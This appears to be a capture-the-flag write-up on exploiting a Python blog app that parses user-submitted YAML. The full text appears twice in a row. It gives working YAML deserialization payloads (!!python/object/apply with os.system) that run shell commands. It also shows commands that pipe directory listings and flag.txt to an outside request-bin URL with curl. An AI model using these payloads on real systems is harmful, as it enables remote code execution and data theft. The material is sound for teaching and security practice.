We have to sign up and then log in to see a page with shared stories. When we do we are greeted with a blog listing. At the bottom there is a button to add our own story to the blog. ![Story time front page][story-time] ![Story time yaml form][story-time-form] We can try to send some malformed yaml to the page: ``` yml title: "Title of your story" synopsis: "This is a brief summary of your story" plot: ---and they lived happily ever after. The End keywords: - "example" - "fiction" ``` ``` Bad Request Error parsing yaml: while scanning a simple key in "", line 4, column 1: ---and they lived happily ever a ... ^ could not find expected ':' in "", line 6, column 1: keywords: ^ ``` Googling the errors didn't really give me any clues to which framework was being used, so I decided to just try a few simple payloads. My first payload was: ```yml !!python/object/apply:subprocess.Popen - ls ``` Giving the error below, at least now we can be pretty sure we're dealing with a python application. ``` Internal Server Error 'Popen' object is not subscriptable ``` I actually spent a lot of trying to get Popen to work, but found a different payload after a while. ``` yml !!python/object/apply:os.system - ls ``` It succeeds, but the data does not appear anywhere. We can easily exfiltrate data though with a request bin though. ```yml !!python/object/apply:os.system - ls | curl -X POST --data-binary @- https://postb.in/1601157034473-5430747917853 ``` The flag is in the web directory, so we can just issue a new command: ```yml !!python/object/apply:os.system - cat flag.txt | curl -X POST --data-binary @- https://postb.in/1601157034473-5430747917853 ``` [story-time]: https://lorentzvedeler.com/assets/imgs/yaml-blog.png "Story time front page" [story-time-form]: https://lorentzvedeler.com/assets/imgs/yaml-form.png "Story time form" Original writeup (https://lorentzvedeler.com/writeup/2020/09/26/bsidesbos- web/).We have to sign up and then log in to see a page with shared stories. When we do we are greeted with a blog listing. At the bottom there is a button to add our own story to the blog. ![Story time front page][story-time] ![Story time yaml form][story-time-form] We can try to send some malformed yaml to the page: ``` yml title: "Title of your story" synopsis: "This is a brief summary of your story" plot: \---and they lived happily ever after. The End keywords: \- "example" \- "fiction" ``` ``` Bad Request Error parsing yaml: while scanning a simple key in "", line 4, column 1: \---and they lived happily ever a ... ^ could not find expected ':' in "", line 6, column 1: keywords: ^ ``` Googling the errors didn't really give me any clues to which framework was being used, so I decided to just try a few simple payloads. My first payload was: ```yml !!python/object/apply:subprocess.Popen \- ls ``` Giving the error below, at least now we can be pretty sure we're dealing with a python application. ``` Internal Server Error 'Popen' object is not subscriptable ``` I actually spent a lot of trying to get Popen to work, but found a different payload after a while. ``` yml !!python/object/apply:os.system \- ls ``` It succeeds, but the data does not appear anywhere. We can easily exfiltrate data though with a request bin though. ```yml !!python/object/apply:os.system \- ls | curl -X POST --data-binary @- https://postb.in/1601157034473-5430747917853 ``` The flag is in the web directory, so we can just issue a new command: ```yml !!python/object/apply:os.system \- cat flag.txt | curl -X POST --data-binary @- https://postb.in/1601157034473-5430747917853 ``` [story-time]: https://lorentzvedeler.com/assets/imgs/yaml-blog.png "Story time front page" [story-time-form]: https://lorentzvedeler.com/assets/imgs/yaml-form.png "Story time form" Original writeup (https://lorentzvedeler.com/writeup/2020/09/26/bsidesbos- web/).